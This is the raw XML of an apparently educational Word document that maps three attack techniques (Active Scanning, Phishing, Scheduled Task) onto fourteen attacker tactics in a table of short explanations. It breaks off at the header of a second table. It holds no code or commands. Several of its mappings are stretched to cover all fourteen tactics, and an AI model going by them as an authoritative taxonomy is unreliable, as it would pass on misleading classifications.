      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the Techniques Map to All 14 Tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75D036" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Each of the 3 techniques (Active Scanning, Phishing, Scheduled Task) helps the attacker achieve different goals (tactics). Here's how they map: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02"/>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="4572"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="52B422E3" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC18A4C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AE367E9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Covered Technique(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="011661D7" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6732BC91" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63AB37A1" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A8206A3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29456B51" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attacker scans to learn about targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6E35A120" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20790515" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC4BA83" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F342328" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Used to identify and prepare targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="3B4B609A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A734289" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CC49A0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02316063" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Used to enter the system via user trick</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="0F3F91D9" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C5B4FC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CBD0B81" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B6F132E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Malware is executed when macro/file is opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="0FC8EFC5" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14CAE5E9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E2D856" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07923A08" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attacker regains access after reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="5255C545" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA30826" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B7C5A64" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CA49E31" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Task runs with higher permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="33586F4F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F7DD17E" w14:textId="51EA45C1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>e Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DA980D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55081D49" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Hides malware behind system tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="76D42D71" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62B2F1DA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:lastRenderedPageBreak/>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F53554" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0B9808" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Fake login pages steal passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4B8A0DC4" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E02D47" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6735E5EA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C23C25" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Identifies systems, services, users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2D2BBD94" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3EE622" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0F563B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296BF1E6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Can be used to reach other systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="478F1D8A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02149303" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A588F10" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627542C3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Collects sensitive information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2A54F4C7" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586D03C9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="693708E3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5CE89E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Used to contact attacker server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="05D8865F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183F480B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBB87FD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B5CE562" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Sends stolen data out silently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="393F4A80" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EA78C9A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CC9E296" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48066AE2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Executes ransomware, wipes, or shutdowns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="018CE5AE" w14:textId="77777777" w:rsidR="001D5AD4" w:rsidRDefault="001D5AD4" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D861F0" w14:textId="2C638909" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Table of Techniques and Procedures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22"/>
        <w:gridCol w:w="2026"/>
        <w:gridCol w:w="1928"/>
        <w:gridCol w:w="3350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6D09952E" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4031E21E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54BC8000" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procedure 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E875771" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procedure 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="093262EB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Tactics</w:t>
            </w:r>
          </w:p>
